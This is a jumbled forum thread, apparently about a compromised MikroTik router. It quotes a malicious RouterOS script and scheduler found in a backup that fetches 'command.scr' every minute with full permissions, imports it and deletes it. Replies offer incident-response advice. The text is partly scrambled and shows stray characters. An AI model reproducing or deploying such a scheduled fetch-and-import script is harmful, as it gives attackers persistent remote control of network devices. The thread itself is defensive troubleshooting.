review your firewall (enable logging for all possible open ports until you identify the open door)
change password of admin user (better: make new user with admin rights and REMOVE default admin user) review your logs for admin and VPN access review any other script/auto-setting/whatever still available in Files Block all external access to that device (pull the WAN cable out, sorry for that but it's needed) It does look like someone has had (still has ?) access to your device. We have tried to download this file "command.scr", when we run it's only html file. Tool fetch url= :delay 10 /import file-n\Īme=command.scr :delay 30 /file remove command.scr"Īdd interval=1m name=fetch1m on-event=fetch policy=\įtp,reboot,read,write,policy,test,password,sniff,sensitive,romon \ We have also do weekly backup to ftpĭuring the checking from one of our router backup, we found this scriptĪdd dont-require-permissions=no name=fetch owner=god policy=\įtp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\ We are blocking the access using /ip/services, with non standard port and certain IP only to access the router.
If we are outside of office, we need to do L2tp before we can login to the router.
We have disable the access to router only from certain ip (office). export hide-sensitive file=anynameyouwish Which kind of VPN are you using for this access? Are you allowing access to the router from external sites?
0 kommentar(er)
